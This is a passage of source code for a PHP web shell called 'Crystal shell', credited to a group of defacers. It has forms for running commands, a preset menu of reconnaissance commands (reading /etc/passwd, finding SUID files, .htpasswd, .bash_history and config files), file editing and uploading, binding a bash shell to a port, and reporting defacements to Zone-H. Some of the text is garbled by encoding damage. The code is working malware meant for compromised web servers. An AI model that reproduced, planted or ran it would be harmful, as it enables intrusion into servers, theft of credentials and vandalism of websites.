"</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename)); if (is_writable($filename) == true){ $directory = $directory . "<td>Yes</td>";} else{ $directory = $directory . "<td>No</td>";

    } if (is_readable($filename) == true){ $directory = $directory . "<td>Yes</td>";} else{ $directory = $directory . "<td>No</td>"; } $dires = $dires . $directory; } if (is_file($filename) == true){ $file = ""; $file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>&q uot; . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename)); if (is_writable($filename) == true){ $file = $file . "<td>Yes</td>";} else{ $file = $file . "<td>No</td>"; } if (is_readable($filename) == true){ $file = $file . "<td>Yes</td></td></tr>";} else{ $file = $file . "<td>No</td></td></tr>"; } $files = $files . $file; }

    } echo $dires; echo $files; echo "</table><br>";

    echo " <form action=\"$REQUEST_URI\" method=\"POST\"> <table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\""; echo getcwd();

    echo "\"> <INPUT type=\"submit\" value=\"Exec\" id=input></td></tr></table></form>";

    ?> </td></tr></table></p></td></tr> </table> </a><br><hr size="1" noshade><p align="right"> <font face="Wingdings 3" size="5" color="#DCE7EF">&lt;</font><b><select name="act"><option value="ls"> With selected:</option><option value="delete">Delete</option><option value="archive"> Archive</option><option value="cut">Cut</option><option value="copy">Copy</option><option value="unselect"> Unselect</option></select>&nbsp;<input type="submit" value="Confirm"></p></form></td></tr ></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center"> <b> :: </b> <font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr> <tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b> <? echo " <form action=\"$REQUEST_URI\" method=\"POST\"> Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">"; ?> <input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p> &nbsp;</p> </td> <td width="50%" height="1" valign="top" bgcolor="#000000" style="color:

    #000000"><center> <form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/"> <font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la"> -----------------------------------------------------------</op tion> <option value="ls -la /var/lib/mysq">ls MySQL</option> <option value="which curl">cURL ?</option> <option value="which wget">Wget ?</option> <option value="which lynx">Lynx ?</option> <option value="which links">links ?</option> <option value="which fetch">fetch ?</option> <option value="which GET">GET ?</option> <option value="which per">Perl ?</option> <option value="gcc --help">C gcc Help ?</option> <option value="tar --help">tar Help ?</option> <option value="cat /etc/passwd">Get passwd !!!</option> <option value="cat /etc/hosts">Get hosts</option> <option value="perl --help">Perl Help ?</option> <option value="find / -type f -perm -04000 -ls"> find all suid files</option><option value="find . -type f -perm -04000 -ls"> find suid files in current dir</option><option value="find / -type f -perm -02000 -ls"> find all sgid files</option><option value="find . -type f -perm -02000 -ls"> find sgid files in current dir</option><option value="find / -type f -name config.inc.php"> find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;"> find config* files</option><option value="find . -type f -name &quot;config*&quot;"> find config* files in current dir</option><option value="find / -perm -2 -ls"> find all writable directories and files</option><option value="find . -perm -2 -ls"> find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd"> find all service.pwd files</option><option value="find . -type f -name service.pwd"> find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd"> find all .htpasswd files</option><option value="find . -type f -name .htpasswd"> find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history"> find all .bash_history files</option><option

    value="find . -type f -name .bash_history"> find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc"> find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc"> find .fetchmailrc files in current dir</option><option value="lsattr -va"> list file attributes on a Linux second extended file system</option><option value="netstat -an grep -i listen"> show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr> </TABLE> <font face="Verdana" size="-2"><a href="?act=bind">Bind port to</a></font><a bookmark="minipanel"><font face="Webdings" size="5" color="#DCE7EF">A</font></a><font color="#00FF00"><br> </font> <a bookmark="minipanel"> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr> <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST"> <p align="center"> <b><font face="verdana" color="red" size="4"> <a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"> <font face="verdana" size="-2" color="#DCE7EF">::</font></a></font>< ;/b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="3">Edit/Create file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="-2" color="#DCE7EF">::</font></a></font>< ;/b><font face="Wingdings 2" size="5">&quot;</font></p> <p align="center"> &nbsp;<? if ($act == "edit") {echo "<center><b>C?E??&i acute;? ?C?C?OC?:<br> ;<br> ?? E??? C?? C????

    C??? E??I E????? ???<br>?E?I ?C?? C??U? ??? config.php ?EC?<br>Edit<br>?E& Ugrave;?? ?? ?C??? E?C ??E??CE C???? <br>?C??C ? C?C C?IE C?OC? ??? ??? ?? C??? ?? C?C?EICI <br>?E?I ?C?? C?EE ?CE??I washer-crystal.txt </a>.</b>";} ?></p> <p>&nbsp;</p> <p> <? echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> File to edit: <input type=\"text\" name=\"editfile\" > <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\"> <INPUT type=\"submit\" value=\"Edit\"></form></div>"; ?> </p> </form></center></p></td> <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center"><b> :: </b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="3"> upload</font></span></a><b>::</b>< a bookmark="minipanel" href="?act=uploads"><font face=Webdings size=5>&#325;</font></a><center> <a bookmark="minipanel" href="?act=uploads"> </a> </a><p align="center"> <? if ($act == "upload") {echo "<center><b>??? C????CE:<br>< br>?? EE?I?I C???? C???CI

    ???? <br>?E?I ?C?? ?? EC??U? ??? C?I?C? C?????<br>UPLOAD< </a>.</b>";} ?><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp; <? echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\"> <INPUT type=\"file\" name=\"userfile\"> <INPUT type=\"hidden\" name=\"post\" value=\"yes\"> <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"> <INPUT type=\"submit\" value=\"Download\"></form></div>"; ?> <p></form></p></td> <? echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> <b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"> <b>Port</b><input type=\"text\" name=\"port\" value=\"3333\"> <INPUT type=\"hidden\" name=\"installbind\" value=\"yes\"> <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"> <INPUT type=\"submit\" value=\"Connect\"></form></div>"; ?> <? if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>?&At ilde;IE?C? C?C?C?? C??C??? Select -----x C?U? ??? C?I?C?<br>.?C?C C?IE ?ECE? C?C?C?? E???? ?I E?E?? EC?I?C?<br>Comma nd </a>.</b>";} ?>

    <? if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect ?? EC??U? ??? I?C?.<br>.E?I ?C?E? C??C? C?????EE EC????I<br>.-&Eci rc;??? ?CICE C??E ?CE ?E??E ???<br>nc -lp 3333E?ECEE C????? <br>C?????E&Ecir c; E?UE C?E??? <br>Bind port to :<br> bind shell ?????C ? ?? </a>.</b>";} ?> <? if ($act == "about") {echo "<center><b>C????& Ograve;CE:<br><br>??C?E C????CE ?? C???? C?A??.<br>.?C??E ????? EC?C?C?? C???C?I? ?????? C?E???<br>.-?&aeli g;E ?? E???? ?C?OC? ???? C????CE E?? ?????<br>E?? ????? Defacer Zone-h CO?? CIE?C?? EC?C??C? ?E? I?C? - <br> E???E ?E???? <br>??E? ????EC? :<br> C????C? : C?????E C???E?E C????I?E<br> ;ooloo605@hotmail.com </a>.</b>";} ?> </tr> </table> <b> <p align="center"> <font face="Verdana"

    size="-2"></b><b> <a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">&nbsp; <? if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br>C&Oa cute;? C????? Defacer<br>C????? C??IE?? Victim<br>??? C?CIE?C? C? ??? C?EU?? C?E? C?EE??E?C Attack Mode <br> ?EE C?CIE?C? Attack Reason <br>?C??C? C?CIE?C? sand <br> ????? CI? C?E????CE C?????? EC????? Attacks On Hold</a>.</b>";} ?><FORM name=notifyForm action=http://www.zone-h.org/component/option,com_notify/Itemid,89/tas k,single/ method=post> <TABLE class=contentpane cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <!-- DESCRIPTION --> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS --> </TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000" bordercolordark="#000000"> <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE"> <TBODY> <TR style="border-left: 1px solid

    #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000" align=left><SPAN style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY&g t;</TABLE><!-- Input Form --> <TABLE class=notifyForm width="100%"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD noWrap align=left width="15%" height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000"> ::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD> <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <INPUT class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font> </font></TD> <font size=-2 face=verdana color=white> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <b><font size="1" color="#FF0000">::Victim::</font></b>:<fon t size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD> <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <INPUT class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" maxLength=250 value=http://www.microsoft.com name=domain size="1"> </TD> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD noWrap align=left height=20

    style="color: #000000; border: 1px solid #000000; background-color: #000000"> <b> <font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD> <TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <SELECT class=inputbox style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION value="" selected>choose</OPTION> <OPTION value=23>Access credentials through Man In the Middle attack</OPTION><OPTION value=22>Attack against the administrator/user (password stealing/sniffing)</OPTION><OPTION value=29>DNS attack through cache poisoning</OPTION><OPTION value=28>DNS attack through social engineering</OPTION><OPTION value=17> File Inclusion</OPTION><OPTION value=9>FTP Server intrusion</OPTION><OPTION value=8>Mail Server intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14> Other Server intrusion</OPTION><OPTION value=18> Other Web Application bug</OPTION><OPTION value=19> Remote administrative panel access through bruteforcing</OPTION><OPTION value=20>Remote administrative panel access through password guessing</OPTION><OPTION value=21>Remote administrative panel access through social engineering</OPTION><OPTION value=25>Remote service password bruteforce</OPTION><OPTION value=24>Remote service password guessing</OPTION><OPTION value=26> Rerouting after attacking the Firewall</OPTION><OPTION value=27>Rerouting after attacking the Router</OPTION><OPTION value=12> RPC Server intrusion</OPTION><OPTION value=13>Shares misconfiguration</OPTION><OPTION value=15>SQL Injection</OPTION><OPTION value=10>SSH Server intrusion</OPTION><OPTION value=11>Telnet Server intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7> Web Server external module intrusion</OPTION><OPTION value=6>Web Server intrusion</OPTION></SELECT></TD></TR> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">

    <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <b> <font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD> <TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <SELECT class=inputbox style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION value="" selected>choose</OPTION> <OPTION value=4>As a challenge</OPTION><OPTION value=1>Heh...just for fun!</OPTION><OPTION value=5>I just want to be the best defacer</OPTION><OPTION value=7> Not available</OPTION><OPTION value=6>Patriotism</OPTION><OPTION value=3>Political reasons</OPTION><OPTION value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY& gt;</TABLE> <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000" align=left><SPAN style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY&g t;</TABLE> <DIV style="CLEAR: both"></DIV> <TABLE class=notifyForm width="100%"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000"> <INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid

    #C0C0C0; background-color: #EEEEEE">&nbsp;&nbsp;<b><font size=4 face="Wingdings 3">:</font></b>&nbsp;&nbsp; </font></font> <font size=6 face=Webdings color="#FF0000">L </font><b> <a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,4 5/"> <font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000"> </font> <font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY>< /TABLE> <INPUT type=hidden value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"> </TR></TBODY></TABLE></FORM></font><? if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>An aconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack </a>.</b>";} ?></b><br> <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr> <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center"> <b> &nbsp;</b><font face="Wingdings 3" size="5">y</font>Crystal shell v. 1 beta<b>&nbsp; </b> <a bookmark="minipanel"><b> <a href="?act=about"><u> powered by</u></a></b></a><font color="#CC0000"><span lang="en-us">l </span> Super-Crystal</font> <a href="?act=team">Arab Security Center Team</a><b> </b><a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>< b> : </b> Web<b> </b> <font face="Wingdings 3" size="5">x</font></p> <p align="center">&nbsp;</p></td></tr> </table>

    <p align="center">&nbsp;</p> </body></html>

    Вам также может понравиться